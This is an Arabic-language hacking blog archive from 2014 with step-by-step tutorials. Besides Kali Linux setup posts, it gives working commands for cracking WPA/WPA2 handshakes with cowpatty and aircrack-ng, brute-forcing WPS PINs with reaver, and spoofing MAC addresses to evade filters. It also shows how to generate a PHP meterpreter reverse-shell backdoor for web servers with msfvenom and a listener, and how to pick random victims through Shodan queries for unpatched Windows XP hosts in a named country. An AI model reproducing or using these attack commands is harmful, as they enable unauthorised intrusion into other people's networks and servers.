juin 2014 | Hackshow Blog Hackshowblog

ربنا لاتؤاخذنا ان نسينا او اخطئنا ربنا ولا تحمل علينا اصرا كما حملته على الذين من قبلنا ربنا لا تحملنا مالا طاقة لنا به واعف عنا واغفر لنا وارحمنا انت مولانا فانصرنا على القوم الكافرين

mardi 24 juin 2014

كالي لينكس : تنصيب الثيمات و Cairo Dock




كيفكم حبآيبي ان شاء الله الجميع بخير وفي صحة وعافية 

 اليوم باذن الله راح نتكلم عن تغير الثيمات وتنصيب الدوك 

  : أمر تنصيب اداة تغير الثيمات 


apt-get install gnome-tweak-tool

: أمر تنصيب الدوك واظافات


sudo apt-get install cairo-dock cairo-dock-plug-ins

  : موفع لتحميل الثيمات 


http://gnome-look.org


فديو التطبيق :



في أمان الله 
14:35
-

تحديث كالي لينكس وتنصيب برامج أخرى





كيفكم حبآيبي ان شاء الله الجميع بخير وفي صحة وعافية 


 اليوم باذن الله راح نتكلم عن تحديث كالي واظافة بعض البرامج

متل   : recordmydesktop,flashpayer,hexedit , getedit


ملف التكست المستعمل في الشرح : 

recorder desktop : 

برنامج تسجيل سطح المكتب

  apt-get install gtk-RecordMydesktop
-----------------------------------------------------------------------

  FLash player :

apt-get install flashplugin-nonfree

update-flashplugin-nonfree --install
-----------------------------------------------------------------------
How To Add Full Repository :

اظافة المستودعات 

sudo nano /etc/apt/sources.list

تنسح وتلصق روابط 

deb http://http.kali.org/ /kali main contrib non-free
deb http://http.kali.org/ /wheezy main contrib non-free
deb http://http.kali.org/kali kali-dev main contrib non-free
deb http://http.kali.org/kali kali-dev main/debian-installer
deb-src http://http.kali.org/kali kali-dev main contrib non-free
deb http://http.kali.org/kali kali main contrib non-free
deb http://http.kali.org/kali kali main/debian-installer
deb-src http://http.kali.org/kali kali main contrib non-free
deb http://security.kali.org/kali-security kali/updates main contrib non-free
deb-src http://security.kali.org/kali-security kali/updates main contrib non-free

وبعدها تضغط   CTRl+X

وبعدها y 

ثم Enter

 sudo apt-get update

 sudo apt-get upgrade 

----------------------------------------------------------------------
Gedit text Editor : 

 apt-get install gedit 
----------------------------------------------------------------------
  hexedit:  محرر الهكس
apt-get install hexedit 
----------------------------------------------------------------------
   جزمة أوفيس لقراءة المستندات  :libre office

apt-get install libreoffice


فديو التطبيق : 


في أمان الله 

14:25
-

دورة فك تشفير الشبكات : عمل بروت فورس بإستخدام Cowpatty





السلام عليكم 

كيفكم حبآيبي ان شاء الله الجميع بخير وفي صحة وعافية 

اليوم باذن الله راح نتكلم عن Cowpatty - genpmk 

والفرق بيهما في منهجية فك التشفير 


شرح مصطلحات :



PSK : Pre-Shared Key


هي عبارة عن طريقة التأمين الشبكات وتستعمل غالبا في المنزل , 


ويستعمل فيها بدل الكود ال passphrase هو متل باس 

لكن يكون حجمه كبير  

من 8 أحرف  إلى 26 في WPA


وفي WPA2 من 8 إلى 64 حرف .باستخدام تكنولوجيا تسمى


TKIP :Temporal Key Integrity Protocol ومنها يتم


 صناعة مفاتيح خاصة ومختلفة لكل عميل متصل بالشبكة


 ويتم تغييرها بانتظام .


عند محاولة العميل اتصال بالشبكة يقوم الراوتر بإرسال


Master Key :MK إلى عميل 

وبعدها يقوم كل واحد منهم باشتقاق 


Pairwise Master Key : PMK من MK 

وبعدها يتم إنتقال إلى مرحلة  PTK: Pairwise Transient Key


لتحقق من كلمة المرور .

نحن سنقوم بالتقاط الهاندشيك التي سنشتق منها PMK


التي سيكون فيها مفاتيح مشفرة . 



المرجع الكامل : تفضل

البرامج :



cowpatty


سنقوم باشتغال بطرقيتن البروت فورس العادية وطريقة الإعتماد

 على هاش البرنامج أخر

يعني الهاش الذي سنحصل عليه من أداة Genpmk

genpmk:


سنقوم بصناعة مفتاح الرئيسي  (هاش) لتسهيل علمية البروت فورس

wordlist:


لتخمين  يفضل  ورد لست تكون مصممة خصيصا

 على حسب نوع التشفير



WPA : 8-26 && WPA2: 8-64



أوامر :



:  الطريقة العادية


cowpatty -f /root/worldlist.txt -r /root/handshake.cap -s ADSL



: الطريقة الأخرى 


genpmk -f '/root/wpa-list.txt' -d hashwpa -s ADSL


cowpatty  -r '/root/handshake.cap' -d hashwpa -s ADSL

:  فديو التطبيق


طبعا تطبيق سيتم على نفس الهاندشيك اللي التقطناها سابقا 




في أمان الله 

13:39
-

دورة فك تشفير الشبكات : عمل بروت فورس بإستخدام Aircrack-ng



كيفكم حبآيبي ان شاء الله الجميع بخير وفي صحة وعافية 

 اليوم باذن الله راح نتكلم عن فك تشفير الشبكات

 باستعمال حزمة Aircrack

اخذ handshake وكسره باستعمال وردلسات محلية / على النت 

http://wpa.darkircop.org

https://www.cloudcracker.com

موسوعة وردلستات

goo.gl/xqq6I

فك ضغط ورد لست الموجودة في كالي  هو 

gunzip /usr/share/wordlists/rockyou.txt.gz

امر نسخها الى سطح مكتب

cp /usr/share/wordlists/rockyou.txt /root/Desktop

فديو التطبيق : 


في أمان الله 
12:39
-

دورة فك تشفير الشبكات : تغيير الماك ادرس Change Mac Address spoof



السلام عليكم



كيف حالكم شباب , اليوم بإذن الله سنتكلم عن تغير الماك أدرس 


لتخطي Mac Filter



ما هو الـ Mac Address ؟




الجواب : هو العنوان الفيزيائي لكرت الشبكة, كلمة Mac

 هي إختصار لـ Media Access Control

 و كل كرت شبكة يأتي بماك أدرس مختلف عن الآخر و لا يمكن

وجود كرتين لهما نفس قيمة الماك أدرس و بشكل عام لا يمكننا تغيير 

القيمة الموجود بكرت الشبكة لأنها تأتي مصنعة هكذا لكن يمكننا

 أن نقوم بتغييرها من النظام فعند بدء كل تشغيل يقوم النظام بنسخ قيمة 

الماك أدرس الحقيقي الى الرام وفي هذه الحالة اذا أردنا تغيير الماك أدرس

 سنقوم بتغيير القيمة الموجودة بالرام فقط! و هذا يعني أن

الماك أدرس سيتغير بشكل مؤقت و بعد اعادة تشغيل الجهاز ستعود 

قيمة الماك أدرس كما كانت و كأن شيء لم يكن, يتألف المك أدرس 

من 6 قيم HEX تكون

 فيها الأحرف من A – F أما الأرقام من 0 – 9 مثال على ذلك:

B9-52-C4-7C-00-22 OR 00:19:B9:52:C4:7C

يتم تقسيم ال
MAC الى قسمين متساويين كل منها يساوي 6 أرقام

 من اليسار إلى اليمين يتم تخصيص القسم الاول بترقيم

معين تضعه
IEEE أو مايسمى بالمعهد الدولي لهندسة الإلكترون والكهرباء

والقسم الاخر يتم وضعه من قبل الشركات المصنعة لكروت الشبكة

 يتم إستخدام ال MAC بشكل رئيسي في شبكات ال ETHERNET .

ifconfig -a | awk '/HWaddr/ {print "Interface: " $1 "\t MAC: " $NF}'


أمر معرفة كل عناوين الماك لكل interfaces :


الطريقة الأولى :




sudo ifconfig interface down

sudo ifconfig interface hw ether 08:00:00:00:00:01

ifconfig interface up

الطريقة الثانية :

نفتح ملف إعدادات بأي محرر نصوص

gedit /etc/network/interfaces

سنجد متل هذا العلم :

#iface eth0 inet dhcp

auto eth0

hwaddress ether 08:00:00:00:00:01


تم نظيف إليه أمر اللي بأحمر كاملا مع ماك أدرس بأخضر


وبعدها نحفظ

نطبق أمر التالي لأعادة تشغيل الخدمة

sudo service networking restart

أو

/etc/init.d/network-manager stop

/etc/init.d/network-manager start



الطريقة الثالتة :

نحمل برنامج :

sudo apt-get install macchanger -y


وضع ماك أدرس من نفس نوع :


sudo macchanger -a eth0

تخصيص ماك أدرس :

sudo macchanger -m 02:02:02:00:00:01 eth0

إرجاع الماك أصلي لقطعة :

sudo macchanger -p eth0




 : إستخدام ريفر مع الماك المزور 

reaver -i mon0 -b 00:01:02:03:04:05 -vv --mac=00:BA:AD:BE:EF:69


أترككم مع الفديو :




في أمان الله 



12:24
-

اختراق الداخلي والخارجي : صناعة باكدور بجميع الصيغ و تشفيره





كيفكم حبآيبي ان شاء الله الجميع بخير وفي صحة وعافية 

اليوم باذن الله راح نتكلم عن اختراق الداخلي والخارجي

 وذلك صناعة باكدور

بجميع الصيغ وتشفيره باستخدام الميتاسبوليت 


ملف الشرح 

http://pastebin.com/KvJqbbGP


: فديو التطبيق 


12:11
-

كيفية جلب الضحايا عشوائيا واختراقهم عن طريق الميتاسبوليت



كيفكم حبآيبي إن شاء الله الجميع بخير وفي صحة وعافية 

اليوم بإذن الله راح نتكلم عن جلب الضحايا عشوائيا

 وإختراقهم عن طريق الميتا 

مقدم الشرح 

Th3-SiMow

الأدوات


Search Engine For Hackerz : www.shodanhq.com/home

Angry ip sCanner : angryip.org/w/Download

search on worldwide : http://www.nirsoft.net/countryip

أمر البحت في موقع ضحايا

port:445 os: xp country: il

بعد اختراق ينصح برفع سرفر لأي برنامج ﻻختراق أو تطيبق 

دروس دورة الباكتراك

ﻻ تسنوا أن تشاركوا الفديو لتشجيع الأخ لتقديم دروس أخرى 

 : فديو التطبيق 



11:49
-

إختراق خوادم الويب من خلال باكدور ميتاسبوليت PHP




كيفكم حبآيبي ان شاء الله الجميع بخير وفي صحة وعافية 

اليوم باذن الله راح نتكلم 

عن أختراق خوادم الويب من خلال باكدور ميتاسبوليت PHP


مستلزمات لتطبيق على جهازك : 


Apache2

Php shell

Metasploit



امر تنصيب Apache :

sudo apt-get install apache2

لقرائة PHP على السرفر :

sudo apt-get install libapache2-mod-php5

تصريح ملف PHP :

chmod 644 file.php

الأن نمر مباشرة الى تريمنال ونكتب امر تالي 


msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.11 LPORT=81 -f raw > shell.php


شرح اوامر : 


P: تعني بايلود

LHOST : عنوان ايبي الخاص بك سواء الخارجي او داخلي 



LPORT: بورت الذي ستصل عليه البايلود



F Raw : Format Raw 



البايلود الذي اخترناه بعد استغلال يقوم باتصال بجهازنا على بورت المحدد فوق , 


ملاحظة : يجب اظافة وسوم بي اتش بي للباكدور RAW FORMAT

<? php ?>



وبعدها نكتب امر تالي : 



msfcli multi/handler LHOST=192.168.1.11 LPORT=81 PAYLOAD=php/meterpreter_reverse_tcp E


E: exploit


طيب امر واضح شغلنا سكريبت msfcli لتسريع امر شوي طبعا هذا السكريبت يستعمل 

عموما في عمل شروحات يعني




غير صالح لو حبيت تخترق حقيقة الهدف ,,, ﻻزمك تفتح تريمنال. 


لذلك في حالة وجود المشاكيل نقوم بانتقال الى طريقة المعتادة

msfconsole

use multi/handler

set payload php/meterpreter_reverse_tcp

set lhost 192.168.1.11

set lport 81 

exploit 

تطبيق الشرح : 







10:45
-

موضوع عام : كسر تفشير شبكات WPA-WPS & WPA2-WPS





أهلين شباب 




كيفكم بخير . اليوم سنتطرق إلى كسر الشبكات اللاسلكية ذات التشفير WPA

 بإستغلال تغرة WPS . 


المراجع سأقوم بإدراجها في اخر الموضوع . 




طيب ماذا نحتاج لقيام بهذه العملية . 



أوﻻ نحتاج أداة Reaver و Aicrack-suite 



بامكانك إستخدام التوزيعة الأمنية متل KALI LINUX , Backtrack , Backbox , Black ubunto ... 


ستجدها مسطبة إفتراضيا 


أو بإمكان تحميلها يدويا لو كنت على يوبنتو اتبع الروابط التالية 

تنصيب حزمة Aircrack :

تنصيب أداة Reaver :



بعدها أكمل معي الشرح 



أولا نفتح تريمنال 



أنا على يوبنتو سأقوم بالضغط على اختصار CTRL+ALT+T



طيب نقوم بأخذ صلاحيات الروت بتطبيق الأمر : 



sudo -s 




يجب أن تدخل باسورد تبعك وأضغط أنتر



نطبق أمر تالي لمعرفة interface 

تبع اللاقط ويفي أو كارت الشبكة الاسلكية



airmon-ng 




طيب اسم Interface هو wlan0 

نقوم بعمل طبقة إفتراضية للحقن من خلالها وذلك بتطبيق الأمر 



airmon-ng start wlan0



إسم الطبقة هو mon0 




نتاكد بإعادة تطبيق أمر



airmon-ng 




أوكي أمور تمام


الأن ناتي لمرحلة معرفة الشبكة الموجودة في نطاقنا : 


نستعمل أداة airodump-ng ونشغلها على mon0




airodump-ng mon0




نتتظر شوي ...


لدي شبكة وحيدة متواجدة في نطاقي اﻻ وهي



 ESSID:ADSL مشفرة بتشفير ENC:wpa2



ولها ماك أدريس MAC address:BSSID=00:18:E7:B3:32:00



يتم إتصال بها من خلال (PSK ( Preshared-Key

 والتي تقبل فقط أكتر من 8 أحرف الى 64



حرف لإتصال بها ويسمى PASSPHRASE وليس الباس



الطيب أنا الأن نقوم بعمل بروت فورس



نقوم بمعرفة الخيارت لأداة  Reaver :

نطبق امر reaver -h وسيظهر لنا جميع خيارات المتاحة لأداة

نحن سنحتاج بعض خيارات البسيطة

سنقوم بتشغله على أنترفيس إفتراضي mon0 وهجوم على شبكة

ذات الماك التالي

00:18:E7:B3:32:00




reaver -i mon0 -b 00:18:E7:B3:32:00 -vv 



i:interface 

b:bssid

vv:verbose إظهار معلومات أكتر عن العملية 

ويبدأ الهجوم وتتنظر على حسب الرواتر المهاجم

 قد تستغرق العملية من 0 الى 7 ساعات لتخمين PIN 

الرواتر المستهدف وقد يكون أقل على حسب Pin


انت وحضك ياشيخ الجميل في نسخة الجديدة لreaver انه بإمكانك

 إستكمال الهجوم بعد إيقافه بالضغط على CTRL+X 

وتعيد تطبيق أمر السابق ويكمل عملية البروت فورس 


طيب في بعض مشاكيل تحدت لبعض الرواتر أنها يقع لها crash

وتحتاج reboot .

 لكي تشتغل من جديد والمتسبب في ذلك هو reaver لذلك تحسبا 

لحدوت مشاكل يفضل تقليص مدة تجريب كل Pin واخر 

أضف الخيار التالي لأمر السابق ليصبح : 

reaver -i mon0 -b 00:01:02:03:04:05 -vv -d 10 



يساخوذ 10 تواني بعد تجريب أي Pin وبعدها يكمل 

أو بامكان إستخدام أمر تالي 

reaver -i mon0 -b 00:01:02:03:04:05 -vv --dh-small



سيقوم بإستخدام طريقة Diffie–Hellman (مفاتيح صغيرة) 

لتخفيف الضغط على رواتر 

ملحوظة: في حالة لو كان لديك رواتر PIN ستجده تحت رواتر فيه

 من 4 الى 8 أرقام 


المراجع : 


طريقة Diffie–Hellman :




تعليمات Reaver : 


WPS :

PSK :



في أمان الله 


09:41
-